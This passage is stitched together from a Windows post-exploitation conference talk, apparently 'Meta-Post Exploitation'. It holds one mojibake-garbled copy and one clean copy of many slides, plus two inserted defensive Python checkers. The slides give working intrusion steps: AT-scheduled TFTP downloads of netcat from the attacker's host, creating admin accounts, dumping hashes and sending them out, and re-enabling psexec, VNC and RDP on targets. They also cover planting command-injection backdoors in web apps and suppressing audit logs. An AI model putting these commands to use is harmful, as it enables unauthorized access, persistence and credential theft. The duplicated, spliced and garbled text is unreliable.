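    for raw in ini_text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].lower()
            continue
        if section != "privilege rights" or "=" not in line:
            continue
        key, _, val = line.partition("=")
        rights[key.strip().lower()] = [p.strip().lstrip("*").lower()
                                       for p in val.split(",") if p.strip()]
    return rights


def parse_reg_dwords(reg_text, key_path):
    """DWORD values under one key of a .reg file (quoted names, dword:8 hex digits)."""
    values, in_key = {}, False
    for raw in reg_text.splitlines():
        line = raw.strip()
        if line.startswith("[") and line.endswith("]"):
            in_key = line[1:-1].lower() == key_path.lower()
            continue
        m = re.match(r'"([^"]+)"=dword:([0-9a-fA-F]{8})$', line) if in_key else None
        if m:
            values[m.group(1)] = int(m.group(2), 16)
    return values


def rdp_access(account, ini_text, reg_text):
    """(allowed, reason) for an RDP logon by `account` under these two files."""
    ts = parse_reg_dwords(reg_text, TS_KEY)
    if ts.get("fDenyTSConnections", 1) != 0:   # missing value: assume the safe default
        return False, "fDenyTSConnections is set; Terminal Server refuses all connections"
    rights = parse_privilege_rights(ini_text)
    acct = account.lower()
    if acct in rights.get("sedenyremoteinteractivelogonright", []):
        return False, "account is in SeDenyRemoteInteractiveLogonRight; deny wins over allow"
    if acct not in rights.get("seremoteinteractivelogonright", []):
        return False, "account lacks SeRemoteInteractiveLogonRight"
    return True, "allowed"
```

Run it against a `secedit /export /cfg` of the target before and after the procedure and the reason string tells you which step did not take, which is cheaper than watching mstsc fail and guessing.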

Slide 55

• DEMOS

Slide 56

Abusing The Scheduler

Slide 57

Abusing The Scheduler

• Oldschool techniques can get results on new problems
• Remember this is POST exploitation, so you already have some access
• The AT command schedules things to run at a specified time and date
  – Schedule service must be running

Slide 58

Abusing The Scheduler

• Often these days certain features are disabled for security
  – Clipbook, shares, enumeration
• Use AT to get around these problems
  – Usually NOT disabled

net use \\target\ipc$ password /user:username
at \\target 12:00pm command
Ex: at \\192.168.1.1 12:00pm tftp -i myip GET nc.exe

Slide 59

Abusing The Scheduler

• Often AT is still enabled while many other things you typically use are not
• AT is as good as having a shell
  – Enable / start services
  – Transfer files
  – Adding users
  – Messing with the registry / policies
  – Pretty much anything you can do with a shell
  – Added bonus: defaults to run as SYSTEM

Slide 60

Abusing The Scheduler

• Building a tool around AT
  – Flow
    • Establish authenticated session
    • Determine the time on the target
    • Pass commands to the target to be run 1 min from now
  – Write a batch file that executes everything at once
  – Have the target send you back whatever info you want
  – Be mindful of file transfer protocols: TFTP is good but not always "quiet" or available

Slide 61

Abusing The Scheduler

• Common use example
  – net use \\target
  – net time \\target
  – at \\target (net time + 1min) "tftp -i use GET e.bat"
  – at \\target (net time + 2min) e.bat
  – e.bat does:
    • Adds a user (net user hacked hacked /add)
      – Admin group (net localgroup administrators hacked /add)
    • Gets hash-dumping tools and dumps hashes
    • Sends hashes, identified by IP, back to attacker host

Slide 62

Abusing The Scheduler

• Privileges of LocalSystem that we care about
  – NT AUTHORITY\SYSTEM and BUILTIN\Administrators SIDs
  – SE_IMPERSONATE_NAME
  – SE_TCB_NAME
  – SE_DEBUG_NAME

Slide 63

Massive Automation

Slide 64

Massive Automation

• Automating techniques and tools for use against massive numbers of hosts
• Goals
  – Penetrate as many systems as possible with little interaction and in a short time
  – Ease of use / re-use
  – Lower cost of attack

Slide 65

Massive Automation

• MassNetUse – Establish NetBIOS session credentials on a range of hosts
• MassWinenum – Enumerate NetBIOS information, bypass certain RestrictAnonymous settings
• AtAbuse – Use the scheduler as your "shell" to control ranges of hosts

Slide 66

• DEMOS

Slide 67

• Related talks you should see
  – Beyond EIP – The theoretical tool development end of things (spoonm & skape)
  – Security Implications of Windows Access Tokens (Luke Jennings)

Slide 68

• Acknowledgements
  – Thanks to:
    • All the people from offensivecomputing, nologin, uninformed, IRC and SILC channels
    • HD Moore especially, for support and mentorship
    • Danny Quist, krbklepto, Egypt, spoonm, skape
    • Luke Jennings for his awesome work

Slide 69

• Questions?
• Presentation available at
  www.offensivecomputing.net

  • Meta-Post Exploitation
  • Slide 2
  • Slide 3
  • Slide 4
  • Slide 5
  • Slide 6
  • Slide 7
  • Slide 8
  • Slide 9
  • Slide 10
  • Slide 11
  • Slide 12
  • Slide 13
  • Slide 14
  • Slide 15
  • Slide 16
  • Slide 17
  • Slide 18
  • Slide 19
  • Slide 20
  • Slide 21
  • Slide 22
  • Slide 23
  • Slide 24
  • Slide 25
  • Slide 26
  • Slide 27
  • Slide 28
  • Slide 29
  • Slide 30
  • Slide 31
  • Slide 32
  • Slide 33
  • Slide 34
  • Slide 35
  • Slide 36
  • Slide 37
  • Slide 38
  • Slide 39
  • Slide 40
  • Slide 41
  • Slide 42
  • Slide 43
  • Slide 44
  • Slide 45
  • Slide 46
  • Slide 47
  • Slide 48
  • Slide 49
  • Slide 50
  • Slide 51
  • Slide 52
  • Slide 53
  • Slide 54
  • Slide 55
  • Slide 56
  • Slide 57
  • Slide 58
  • Slide 59
  • Slide 60
  • Slide 61
  • Slide 62
  • Slide 63
  • Slide 64
  • Slide 65
  • Slide 66
  • Slide 67
  • Slide 68
  • Slide 69
Page 9: Meta-Post Exploitation...•Offensive Computing •Metasploit •cDc –Work: •Malware Analyst •Reverse Engineer •Penetration Tester •Exploit developer. Slide: 3 Colin Ames

Slide 9

Why Password Management

ndash Large pentests 1000rsquos of passwordsndash Testing a cracked password on many

systems can be time consumingndash Keeping track of cracking sessionsndash Building and growing your wordlist lets

you crack fasterndash Aids in cleanup stage

bull Tying accounts to systems

Slide 10

Password Management Goals

ndash Acquired password storage ndash Organization and tracking

bull What passwords go with which hostsbull What passwords are sharedbull Which users have access to what

resourcesndash Re-use for further accessndash Expanding wordlist for faster

cracking

Slide 11

Password Management Stages amp Techniques

ndash Acquiring pwdump cat etcshadow cachedump sql query sniffing

ndash Decisions Prioritize accounts to crack ndash Cracking John l0pht Cainndash Tracking Nothingndash Reusing Core Impact

Slide 12

Manual Password Management

bull Existing Toolsndash L0phtCrack

bull Stores passwords in session filesndash CainampAbel

bull Static table difficult to export use automatebull Password Classification (NTLM Cisco SQL md5)

ndash Core Impactbull Good for automated reuse of passwords against many hostsbull No real storage management capability

ndash Text file John the Ripperbull Many peoplersquos methodbull Quick and dirty not easily scalable

Slide 13

Slide 14

bull MetaPassbull Demos

Slide 15

Persistence

Slide 16

A word on Stealth vs Persistence

ndash In the old days a rootkit helped you maintain rootndash Today rootkits are all about hidingndash These two concepts still go hand in hand

Slide 17

Persistence

bull Persistence is maintaining accessbull Why

ndash Targetrsquos can get patchedndash Some exploits are 1 shot onlyndash Sometimes you need to return multiple times to the

targetndash Targetrsquos usefulness not always immediately known

bull Goals Access target as often as neededusefulbull Huge area of studybull Sometimes persistence doesnrsquot matter

Slide 18

Persistence

bull Stages of Persistencendash Initial access

bull Exploitbull Stolen password etc

ndash Decisions What tool to usebull FUZZY ndash OS Environment Target dependent

ndash Setup ndash Re-accessing of targetndash Cleanup Donrsquot be a slob it will get you caught

bull When you no longer need the target leave no trace

Slide 19

Persistence

bull Existing toolsndash Rootkitsndash Backdoorsndash Trojansndash Port knockersndash Adding accountsndash Things like netcat backdoors inetd

modifications process injection stealing credentials etc

Slide 20

Persistence

bull Different perspective on persistencendash If you can always re-exploit who caresndash Inject add modify new vulnerabilities

bull Hard to determine maliciousnessbull We all know its hard to find bugs now

imagine someone is purposefully putting the bugs in

Slide 21

Persistence

bull Leveraging existing persistent admin access

bull Nagios checksbull Attack Configuration Management

ndash Cfenginendash SMSndash Automated Patching Systems (ldquopatchrdquo

them with our trojans)bull GUIrsquos

bull Tool distribution

Slide 22

Persistence

bull Examplebull Machine has VNC installed bull Replace installed VNC with vulnerable version

ndash Authentication bypass bull Copy registry password so target doesnrsquot realizebull Persistence with no backdoors or rootkits to get

detected

Slide 23

Persistence

bull Add vulnerable codebull Example web apps

ndash Take out user input validationndash Inject your vulnerable code

bull Focus on vague intentbull Never be obviously and solely malicious

ndash Look for apps with previous vulnerabilitiesndash Re-introduce patched bugs

Slide 24

Persistence

bull More web app examplesbull Add hidden field to HTML form

ndash Users detect no change app performs normallyltinput type=ldquohiddenrdquo name=ldquoLangrdquogt

bull Edit web app and tie vuln perl code to form field input

If defined $hidden_field open($filenamerdquogt$hidden_field)

bull Craft a POST including the hidden field

Slide 25

Persistence

bull wwwtargetcomcgi-binappcgilang=|cmd| bull Code will execute your commandsbull Who needs to bind a shell to a portbull Unlikely to ever be detected

ndash Especially good in big appsndash Code review canrsquot even be sure of maliciousnessndash Some sites replace code every X time period

bull No rootkits to installbull Tripwire probably wonrsquot see this

Slide 26

Persistence

bull Take concept to another levelndash Add a decoder to web appndash Look for a ldquotriggerrdquo string combination in form

fieldsndash If Name = John Smith and Age = 42 then execute

contents of Address fieldndash URL encode form entries containing commandsndash Have identifier ldquostubrdquo in encoded data for app to

find

Slide 27

Persistence

bull Mixing Stealth with Persistencendash Further encodingndash Take entries from all fieldsndash Concat themndash ldquoDecoderdquo commandsndash Rotational Ciphers (rot 13 ceaser)ndash Even more complex obfuscation

Slide 28

Persistence

bull Covert Accountsndash Add an account renablendash Modify local account policies to allow access

bull Ex SUPPORT_3848576b1 guestndash Add it to the admin group (net localgroup)

bull Only use AT to run your commandsbull Persistence without adding files new accounts

ndash Unlikely to be discovered

Slide 29

bull DEMOS

Slide 30

Stealth Evading Detection

Slide 31

Stealth Evading Detection

bull Hiding your activityndash From

bull IDSbull AVbull LOGGINGbull Suspicious users amp adminsbull Firewallsbull Process listing

Slide 32

Stealth Evading Detection

bull Why Stealthndash If you get caught you get stoppedndash The longer you can operate undetected the more you

can accomplishndash Adminrsquos wonrsquot fix problems they donrsquot know exist

(helps persistence)ndash On a pen test you should also be testing the

organizations detection and response capabilities

Slide 33

Stealth Evading Detection

bull Goalsndash Keep system operable

bull If it breaks you canrsquot use itbull Someone will come fix it

ndash Operate without fear of detectionndash Robustness

bull Hiding shouldnrsquot require constant attentionndash DONrsquoT LOOK MALICIOUS

Slide 34

Stealth Evading Detection

bull Manual Existing Toolsndash Rootkits rootkits rootkitsndash Meterpreterndash Encryption

bull Shellcode Encoders for IDS evasionndash Log cleanersndash Packersndash Covert channels Steganographyndash Anti-analysis anti-forensics

bull See all of OCrsquos other talks bull Also Vinnie Liursquos Metasploit research

Slide 35

Stealth Evading Detection

bull Different Perspectivendash DONrsquoT BE AN ANOMALYndash Hide in plain sight

bull Many tools have ONLY malicious usesbull Make your intent hard to determine

ndash Be noisy on one to divert attention from another

Slide 36

Stealth Evading Detection

bull Different Perspectivendash Know the targets environment better than

they dobull If they donrsquot use encryption maybe you shouldnrsquot eitherbull Change strategies to match environments normal

behavior

ndash Donrsquot always default to exploitsbull See Tactical Exploitation talkbull IDSrsquos canrsquot see normal behavior that is malicious

Slide 37

Stealth Evading Detection

bull Using Windows security objects for stealthndash Auditing of Securable Objects is controlled by SACLrsquosndash Null SACL = No Auditing = No Logs

Slide 38

bull DEMOSndash Kaspersky squeals like a pig

Slide 39

User Identity Theft

Slide 40

User Identity Theft

bull Itrsquos not always about ROOTbull Look like someone else

ndash Use the credentials access of another userbull Goals

ndash Change your identity at willbull User ID domain credentials sessionsbull Impersonate system accountsbull Make activities look like normal user behavior

Slide 41

User Identity Theft

bull Stages and techniquesndash Target users

bull Who has access to whatbull Where is the data

ndash Change Identitybull Hijack credentialssessionsbull Abuse tokens

ndash Access is the end goal be it data or another system

Slide 42

User Identity Theft

bull Existing toolsndash Incognito (metasploit)

bull Enumerate hijack tokensndash FUFUTO

bull Enable SYSTEM privilegesbull Change process privileges DKOM

ndash SU SUDO KSUndash Process injectionndash Hijack domain credentials

Slide 43

User Identity Theft

Tokens Privileges Security Descriptors SIDrsquos SACLrsquos DACLrsquos ACErsquos Ohrsquo My

bull What we wantndash Privileges or SIDrsquos

bull What we getndash Access Access Access

bull How we get itndash Incognito vs FUto

Slide 44

bull DEMOS

Slide 45

Feature Modification

Slide 46

Feature Modification

bull Changing existing features or settings to benefit our activities

bull Goalsndash Support all Post-Exploitation activitiesndash Disabling detection technologiesndash Enabling in-secure or easy to use access

software

Slide 47

Feature Modification

bull Feature Modification is Basically Securable Object Manipulationndash Remember all those Tokens and Security Descriptorsndash These can be modified programmatically and directly

bull Not just through existing toolsndash Stealth Persistence requirements

bull May make it more advantageous to use custom toolsndash Access Objects programmaticallyndash Can be much more complex to implement

Slide 48

Feature Modification

bull Re-enabling disabled accessndash PsExec Itrsquos still cool (Thanks Mark)

bull Enabling GUI accessndash VNC (from a command line)ndash Remote Desktop (even if disabled)

bull Turning off or adding exceptions to security softwarendash Firewalls AV logging

bull Modifying Local Security Policies

Slide 49

Feature Modification

bull Enabling psexecndash Psexec was great awesome remote

shellcommand toolndash Everybody now disables clipbook which

psexec requires l4m3 ndash Lets re-enable it

Slide 50

Feature Modification

bull Enabling psexecbull Use the system control tool scexe

ndash Net use targetipc$ username userpasswordndash Sc target config netdde start= autondash Sc target config netddedsdm start= autondash Sc target config clipsrv start= autondash Sc target start netddendash Sc target start netddedsdmndash Sc target start clipserv

Slide 51

Feature Modification bull Enabling VNC (from command line)

ndash Go get VNC (check out guhnu)ndash Make a folder on the target for the vnc filesndash Copy the following files to target folder

bull Winvncexebull Vncregbull Vnchooksdllbull Omnithread_rtdll

ndash Regedit ndashs vncregndash Winvnc ndashinstallndash Net start ldquovnc serverrdquondash Winvncndash Password is ldquoinfectedrdquo

Vncreg file contents

[HKEY_LOCAL_MACHINESOFTWAREORLWinVNC3Default]SocketConnect=dword00000001AutoPortSelect=dword00000001InputsEnabled=dword00000001LocalInputsDisabled=dword00000000IdleTimeout=dword00000000QuerySetting=dword00000002QueryTimeout=dword0000000aPollUnderCursor=dword00000000PollForeground=dword00000001PollFullScreen=dword00000000OnlyPollConsole=dword00000001OnlyPollOnEvent=dword00000000Password=hex104d893d5ae155f8

Slide 52

Feature Modification

bull Enabling Remote Desktop remotelyndash Having a GUI to your target can be necessary ndash Maybe they are running a specialized GUI app

bull Ex System controlling access to security doorsndash No command line way of modifying system need GUI

bull SCADA systemsbull Security camerasbull Who knows what you might be up to

ndash Remote desktop is fast and already a feature of OSndash However itrsquos often disabled maybe even by GPO

Slide 53

Feature Modification bull Enabling Remote Desktop remotely

ndash Complicated procedure especially if GPOrsquos involved ndash Create a file named fix_ts_policyini

[Unicode]Unicode=yes[Version]signature=$CHICAGO$Revision=1[Privilege Rights]seremoteinteractivelogonright = hacked_accountseinteractivelogonright = hacked_accountsedenyinteractivelogonright =sedenyremoteinteractivelogonright =sedenynetworklogonright =

ndash This file will fix policy settings in your wayndash Change ldquohacked_accountrdquo to a real account

Slide 54

Feature Modification bull Enabling Remote Desktop remotely

ndash Create another file named enable_tsregWindows Registry Editor Version 500

[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal Server]

fDenyTSConnections=dword00000000TSEnabled=dword00000001TSUserEnabled=dword00000000

ndash Then perform these commandsbull sc config termservice start= autobull regedit s enable_tsregbull copy cwindowssecuritydatabaseseceditsdb cwindowssecuritydatabasenewseceditsdbbull copy cwindowssecuritydatabaseseceditsdb cwindowssecuritydatabaseorigseceditsdbbull secedit configure db newseceditsdb cfg fix_ts_policyinibull gpupdate Forcebull net start terminal services

Slide 55

bull DEMOS

Slide 56

Abusing The Scheduler

Slide 57

Abusing The Scheduler

bull Oldschool techniques can get results on new problems

bull Remember this is POST exploitation so you already have some access

bull AT command schedules things to run on at a specified time and date

ndash Schedule service must be running

Slide 58

Abusing The Scheduler

bull Often these days certain features are disabled for security

ndash Clipbook shares enumerationbull Use AT to get around these problems

ndash Usually NOT disabled

Net use targetipc$ password userusernameAt target 1200 pm commandEx At 19216811 1200pm tftp ndashI myip GET ncexe

Slide 59

Abusing The Scheduler

bull Often AT is still enabled while many other things you typically use are not

bull AT is as good as having a shellndash Enable Start Servicesndash Transfer filesndash Adding usersndash Messing with the registry policiesndash Pretty much anything you can do with a shellndash Added bonus defaults to run as SYSTEM

Slide 60

Abusing The Scheduler

bull Building a tool around AT ndash Flow

bull Establish authenticated sessionbull Determine the time on the targetbull Pass commands to the target to be run 1 min from now

ndash Write a batch file that executes everything at oncendash Have the target send you back whatever info you wantndash Be mindful of file transfer protocols TFTP is good but not

always ldquoquietrdquo or available

Slide 61

Abusing The Scheduler

bull Common use examplendash Net use targetndash Net time targetndash At target (net time +1min) ldquotftp ndashi use GET ebatrdquondash At target (net time +2min) ebatndash ebat does

bull Adds a user (net user hacked hacked add)ndash Admin group (net localgroup administrators hacked add)

bull Gets hashdumping tools and dumps hashesbull Sends hashes identified by IP back to attacker host

Slide 62

Abusing The Scheduler

bull Privileges of LocalSystem that we care aboutndash NT AUTHORITYSYSTEM and

BUILTINAdministrators SIDs ndash SE_IMPERSONATE_NAME ndash SE_TCB_NAME ndash SE_DEBUG_NAME

Slide 63

Massive Automation

Slide 64

Massive Automation

bull Automating techniques and tools for use against massive numbers of hosts

bull Goalsndash Penetrate as many systems as possible

with little interaction and in a short timendash Ease of use re-usendash Lower cost of attack

Slide 65

Massive Automation

bull MassNetUse ndash Establish netbios session credentials on range of hosts

bull MassWinenum ndash Enumerate Netbios information bypass certain RestrictAnonymous settings

bull AtAbuse ndash Use the scheduler as your ldquoshellrdquo to control ranges of hosts

Slide 66

bull DEMOS

Slide 67

bull Related talks you should seendash Beyond EIP ndash The theoretical tool

development end of things (spoonm amp skape)ndash Security Implications of Windows Access

Tokens (Luke Jennings)

Slide 68

bull Acknowledgementsndash Thanks to

bull All the people from offensivecomputing nologin uninformed IRC and SILC channels

bull HD Moore especially for support and mentorship bull Danny Quist krbklepto Egypt spoonm skape bull Luke Jennings for his awesome work

Slide 69

• Questions?
• Presentation available at www.offensivecomputing.net

Slide 10

Password Management Goals

– Acquired password storage
– Organization and tracking
  • What passwords go with which hosts
  • What passwords are shared
  • Which users have access to what resources
– Re-use for further access
– Expanding wordlist for faster cracking

Slide 11

Password Management Stages & Techniques

– Acquiring: pwdump, cat /etc/shadow, cachedump, sql query, sniffing
– Decisions: Prioritize accounts to crack
– Cracking: John, l0pht, Cain
– Tracking: Nothing
– Reusing: Core Impact

Slide 12

Manual Password Management

• Existing Tools
  – L0phtCrack
    • Stores passwords in session files
  – Cain & Abel
    • Static table, difficult to export / use / automate
    • Password Classification (NTLM, Cisco, SQL, md5)
  – Core Impact
    • Good for automated reuse of passwords against many hosts
    • No real storage management capability
  – Text file / John the Ripper
    • Many people's method
    • Quick and dirty, not easily scalable

Slide 13

Slide 14

• MetaPass
• Demos

Slide 15

Persistence

Slide 16

A word on Stealth vs Persistence

– In the old days a rootkit helped you maintain root
– Today rootkits are all about hiding
– These two concepts still go hand in hand

Slide 17

Persistence

• Persistence is maintaining access
• Why?
  – Targets can get patched
  – Some exploits are 1 shot only
  – Sometimes you need to return multiple times to the target
  – Target's usefulness not always immediately known
• Goals: Access target as often as needed / useful
• Huge area of study
• Sometimes persistence doesn't matter

Slide 18

Persistence

• Stages of Persistence
  – Initial access
    • Exploit
    • Stolen password, etc.
  – Decisions: What tool to use
    • FUZZY – OS, Environment, Target dependent
  – Setup
  – Re-accessing of target
  – Cleanup: Don't be a slob, it will get you caught
    • When you no longer need the target, leave no trace

Slide 19

Persistence

• Existing tools
  – Rootkits
  – Backdoors
  – Trojans
  – Port knockers
  – Adding accounts
  – Things like netcat backdoors, inetd modifications, process injection, stealing credentials, etc.

Slide 20

Persistence

• Different perspective on persistence
  – If you can always re-exploit, who cares?
  – Inject / add / modify new vulnerabilities
    • Hard to determine maliciousness
    • We all know it's hard to find bugs now; imagine someone is purposefully putting the bugs in

Slide 21

Persistence

• Leveraging existing persistent admin access
  • Nagios checks
  • Attack Configuration Management
    – Cfengine
    – SMS
    – Automated Patching Systems ("patch" them with our trojans)
  • GUIs
  • Tool distribution

Slide 22

Persistence

• Example
  • Machine has VNC installed
  • Replace installed VNC with vulnerable version
    – Authentication bypass
  • Copy registry password so target doesn't realize
  • Persistence with no backdoors or rootkits to get detected

Slide 23

Persistence

• Add vulnerable code
• Example: web apps
  – Take out user input validation
  – Inject your vulnerable code
• Focus on vague intent
• Never be obviously and solely malicious
  – Look for apps with previous vulnerabilities
  – Re-introduce patched bugs

Slide 24

Persistence

• More web app examples
• Add hidden field to HTML form
  – Users detect no change, app performs normally

    <input type="hidden" name="Lang">

• Edit web app and tie vuln perl code to form field input

    if (defined $hidden_field) { open($filename, ">$hidden_field") }

• Craft a POST including the hidden field

Slide 25

Persistence

• www.target.com/cgi-bin/app.cgi?lang=|cmd|
• Code will execute your commands
• Who needs to bind a shell to a port?
• Unlikely to ever be detected
  – Especially good in big apps
  – Code review can't even be sure of maliciousness
  – Some sites replace code every X time period
• No rootkits to install
• Tripwire probably won't see this

Slide 26

Persistence

• Take concept to another level
  – Add a decoder to web app
  – Look for a "trigger" string combination in form fields
  – If Name = John Smith and Age = 42 then execute contents of Address field
  – URL encode form entries containing commands
  – Have identifier "stub" in encoded data for app to find

Slide 27

Persistence

• Mixing Stealth with Persistence
  – Further encoding
  – Take entries from all fields
  – Concat them
  – "Decode" commands
  – Rotational Ciphers (rot 13, caesar)
  – Even more complex obfuscation

Slide 28

Persistence

• Covert Accounts
  – Add an account / re-enable
  – Modify local account policies to allow access
    • Ex: SUPPORT_3848576b1, guest
  – Add it to the admin group (net localgroup)
• Only use AT to run your commands
• Persistence without adding files, new accounts
  – Unlikely to be discovered

Slide 29

• DEMOS

Slide 30

Stealth / Evading Detection

Slide 31

Stealth / Evading Detection

• Hiding your activity
  – From:
    • IDS
    • AV
    • LOGGING
    • Suspicious users & admins
    • Firewalls
    • Process listing

Slide 32

Stealth / Evading Detection

• Why Stealth?
  – If you get caught, you get stopped
  – The longer you can operate undetected, the more you can accomplish
  – Admins won't fix problems they don't know exist (helps persistence)
  – On a pen test you should also be testing the organization's detection and response capabilities

Slide 33

Stealth / Evading Detection

• Goals
  – Keep system operable
    • If it breaks you can't use it
    • Someone will come fix it
  – Operate without fear of detection
  – Robustness
    • Hiding shouldn't require constant attention
  – DON'T LOOK MALICIOUS

Slide 34

Stealth / Evading Detection

• Manual / Existing Tools
  – Rootkits, rootkits, rootkits
  – Meterpreter
  – Encryption
    • Shellcode Encoders for IDS evasion
  – Log cleaners
  – Packers
  – Covert channels / Steganography
  – Anti-analysis / anti-forensics
    • See all of OC's other talks
    • Also Vinnie Liu's Metasploit research

Slide 35

Stealth / Evading Detection

• Different Perspective
  – DON'T BE AN ANOMALY
  – Hide in plain sight
    • Many tools have ONLY malicious uses
    • Make your intent hard to determine
  – Be noisy on one to divert attention from another

Slide 36

Stealth / Evading Detection

• Different Perspective
  – Know the target's environment better than they do
    • If they don't use encryption, maybe you shouldn't either
    • Change strategies to match the environment's normal behavior
  – Don't always default to exploits
    • See Tactical Exploitation talk
    • IDSs can't see normal behavior that is malicious

Slide 37

Stealth / Evading Detection

• Using Windows security objects for stealth
  – Auditing of Securable Objects is controlled by SACLs
  – Null SACL = No Auditing = No Logs
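The defensive counterpart of "Null SACL = No Logs" is an audit-coverage check: for each sensitive object, confirm the SACL exists, is non-empty, and audits both successful and failed access. The SDDL checker below is an added example, not code from the talk; the descriptors are constructed, and conditional ACEs (which contain nested parentheses) are out of scope.

```python
import re

SECTION_RX = re.compile(r"([OGDS]):")
ACE_RX = re.compile(r"\(([^()]*)\)")


def split_sddl(sddl):
    """Split an SDDL string into its O:, G:, D: and S: components.
    A component absent from the string is absent from the result, which is
    exactly how a null SACL shows up: no 'S' key at all."""
    marks = [(m.start(), m.group(1)) for m in SECTION_RX.finditer(sddl)]
    parts = {}
    for i, (start, name) in enumerate(marks):
        end = marks[i + 1][0] if i + 1 < len(marks) else len(sddl)
        parts[name] = sddl[start + 2:end]
    return parts


def parse_aces(component):
    """Turn '(type;flags;rights;object;inherit;sid)' entries into dicts."""
    aces = []
    for body in ACE_RX.findall(component):
        fields = body.split(";")
        if len(fields) < 6:
            continue  # not a standard ACE string
        flags = fields[1].upper()
        aces.append({
            "type": fields[0].upper(),
            # flags are two-letter tokens run together, e.g. OICISAFA
            "flags": {flags[i:i + 2] for i in range(0, len(flags), 2)},
            "rights": fields[2],
            "sid": fields[5],
        })
    return aces


def audit_status(sddl):
    """Classify what the SACL can log.
    'null'          no S: component at all (the Null SACL = No Logs case)
    'empty'         S: present but without any effective audit (AU) ACE
    'success-only', 'failure-only', 'both'   outcomes covered by AU ACEs
    """
    parts = split_sddl(sddl)
    if "S" not in parts:
        return "null"
    audits = [a for a in parse_aces(parts["S"]) if a["type"] == "AU"]
    success = any("SA" in a["flags"] for a in audits)
    failure = any("FA" in a["flags"] for a in audits)
    if success and failure:
        return "both"
    if success:
        return "success-only"
    if failure:
        return "failure-only"
    return "empty"


# Constructed descriptors for a handful of objects on a reviewed host.
SAMPLE_OBJECTS = [
    ("C:\\payroll\\export.csv",
     "O:BAG:SYD:(A;;FA;;;SY)(A;;FA;;;BA)S:(AU;SAFA;FA;;;WD)"),
    ("C:\\payroll\\archive",                          # SACL removed entirely
     "O:BAG:SYD:(A;;FA;;;SY)(A;;FA;;;BA)"),
    ("HKLM\\SOFTWARE\\ORL\\WinVNC3",                  # SACL present but emptied
     "O:BAG:SYD:(A;;KA;;;SY)(A;;KA;;;BA)S:"),
    ("C:\\Windows\\security\\database\\secedit.sdb",  # successful writes unlogged
     "O:BAG:SYD:(A;;FA;;;SY)(A;;FA;;;BA)S:(AU;FA;FA;;;WD)"),
]


def audit_gaps(objects):
    """Objects whose SACL does not audit both successful and failed access."""
    return [(name, audit_status(sddl)) for name, sddl in objects
            if audit_status(sddl) != "both"]


if __name__ == "__main__":
    for name, status in audit_gaps(SAMPLE_OBJECTS):
        print(f"{status:13} {name}")
```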

Slide 38

• DEMOS
  – Kaspersky squeals like a pig

Slide 39

User Identity Theft

Slide 40

User Identity Theft

• It's not always about ROOT
• Look like someone else
  – Use the credentials / access of another user
• Goals
  – Change your identity at will
    • User ID, domain credentials, sessions
    • Impersonate system accounts
    • Make activities look like normal user behavior

Slide 41

User Identity Theft

• Stages and techniques
  – Target users
    • Who has access to what?
    • Where is the data?
  – Change Identity
    • Hijack credentials / sessions
    • Abuse tokens
  – Access is the end goal, be it data or another system

Slide 42

User Identity Theft

• Existing tools
  – Incognito (metasploit)
    • Enumerate / hijack tokens
  – FU / FUTo
    • Enable SYSTEM privileges
    • Change process privileges, DKOM
  – SU, SUDO, KSU
  – Process injection
  – Hijack domain credentials

Slide 43

User Identity Theft

Tokens, Privileges, Security Descriptors, SIDs, SACLs, DACLs, ACEs, Oh My!

• What we want
  – Privileges or SIDs
• What we get
  – Access, Access, Access
• How we get it
  – Incognito vs FUto

Slide 44

• DEMOS

Slide 45

Feature Modification

Slide 46

Feature Modification

• Changing existing features or settings to benefit our activities
• Goals
  – Support all Post-Exploitation activities
  – Disabling detection technologies
  – Enabling in-secure or easy to use access software

Slide 47

Feature Modification

• Feature Modification is Basically Securable Object Manipulation
  – Remember all those Tokens and Security Descriptors?
  – These can be modified programmatically and directly
    • Not just through existing tools
  – Stealth / Persistence requirements
    • May make it more advantageous to use custom tools
  – Access Objects programmatically
  – Can be much more complex to implement

Slide 48

Feature Modification

• Re-enabling disabled access
  – PsExec: It's still cool (Thanks Mark)
• Enabling GUI access
  – VNC (from a command line)
  – Remote Desktop (even if disabled)
• Turning off or adding exceptions to security software
  – Firewalls, AV, logging
• Modifying Local Security Policies

Slide 49

Feature Modification

• Enabling psexec
  – Psexec was a great, awesome remote shell / command tool
  – Everybody now disables clipbook, which psexec requires (l4m3)
  – Let's re-enable it

Slide 50

Feature Modification

• Enabling psexec
• Use the system control tool, sc.exe
  – net use \\target\ipc$ password /user:username
  – sc \\target config netdde start= auto
  – sc \\target config netddedsdm start= auto
  – sc \\target config clipsrv start= auto
  – sc \\target start netdde
  – sc \\target start netddedsdm
  – sc \\target start clipsrv

Slide 51

Feature Modification

• Enabling VNC (from command line)
  – Go get VNC (check out guh.nu)
  – Make a folder on the target for the vnc files
  – Copy the following files to target folder
    • winvnc.exe
    • vnc.reg
    • vnchooks.dll
    • omnithread_rt.dll
  – regedit -s vnc.reg
  – winvnc -install
  – net start "vnc server"
  – winvnc
  – Password is "infected"

vnc.reg file contents:

    [HKEY_LOCAL_MACHINE\SOFTWARE\ORL\WinVNC3\Default]
    "SocketConnect"=dword:00000001
    "AutoPortSelect"=dword:00000001
    "InputsEnabled"=dword:00000001
    "LocalInputsDisabled"=dword:00000000
    "IdleTimeout"=dword:00000000
    "QuerySetting"=dword:00000002
    "QueryTimeout"=dword:0000000a
    "PollUnderCursor"=dword:00000000
    "PollForeground"=dword:00000001
    "PollFullScreen"=dword:00000000
    "OnlyPollConsole"=dword:00000001
    "OnlyPollOnEvent"=dword:00000000
    "Password"=hex:10,4d,89,3d,5a,e1,55,f8

Slide 52

Feature Modification

• Enabling Remote Desktop remotely
  – Having a GUI to your target can be necessary
  – Maybe they are running a specialized GUI app
    • Ex: System controlling access to security doors
  – No command line way of modifying system, need GUI
    • SCADA systems
    • Security cameras
    • Who knows what you might be up to
  – Remote desktop is fast and already a feature of OS
  – However it's often disabled, maybe even by GPO

Slide 53

Feature Modification

• Enabling Remote Desktop remotely
  – Complicated procedure, especially if GPOs involved
  – Create a file named fix_ts_policy.ini

    [Unicode]
    Unicode=yes
    [Version]
    signature="$CHICAGO$"
    Revision=1
    [Privilege Rights]
    seremoteinteractivelogonright = hacked_account
    seinteractivelogonright = hacked_account
    sedenyinteractivelogonright =
    sedenyremoteinteractivelogonright =
    sedenynetworklogonright =

  – This file will fix policy settings in your way
  – Change "hacked_account" to a real account

Slide 54

Feature Modification

• Enabling Remote Desktop remotely
  – Create another file named enable_ts.reg

    Windows Registry Editor Version 5.00

